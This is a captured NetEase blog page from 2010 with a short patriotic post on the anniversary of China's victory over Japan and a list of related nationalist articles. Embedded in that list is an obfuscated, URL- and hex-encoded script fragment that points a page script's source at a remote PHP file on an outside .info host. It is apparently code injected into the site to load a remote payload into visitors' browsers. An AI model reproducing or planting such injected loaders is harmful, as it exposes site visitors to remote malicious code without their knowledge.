注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

朱光平

自己观感所及,随心漫笔,尽可能让自己的观点清晰地表达出来。

 
 
 

日志

 
 

[视频]回望胜利 铭记历史 开创未来  

2010-09-03 23:53:55|  分类: 【视频】 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

五星红旗(勇金) - 勇金 - 勇金

               不能忘却的民族记忆!!!

       观后感:我们中国人真的要牢记这段历史,回想时,心里总是沉甸甸的,现在之幸福生活真的来之不易,这是中国人民付出了多么大的牺牲、多么大的代价?牢记历史,应该刻骨铭心地牢记!

       抗日战争胜利是中国人民近代以来唯一一次对外国侵略者全面彻底的胜利,牢记“9·2”这一日子,这一胜利的日子,洗刷了中华民族千年耻辱,就是要牢记:国衰我耻、国兴我荣!

       我们有了今天这样辉煌成就,国人没有理由不回想过去,不珍惜今天,不万众一心,打造中国更加美好的明天!中国人行,中国人一定行!

 

        相关阅读:

        [转载] 历史的正义必须得到伸张

        [视频]钓鱼岛事件以来最爱国的视频

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<        [NHK纪录片]:日本战败与亚洲 改变世界的五天

        [视频]:看军事博闻 评天下防务

        读后感:日本人玩损害中国主权的这种文字游戏必须戳穿它!

        东海舰队实弹演练精彩视频

        日本,是个正常国家吗?

        中日为什么成不了法德?

        【转载】新中国诞生的划时代意义

        美国改革了日本政治!

        对日本来说美国第一,中国第二

        “日本是怎样崛起的?”读后感

        美国南朝鲜日本的反应成笑柄!

       

    

  评论这张
 
阅读(196)| 评论(23)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017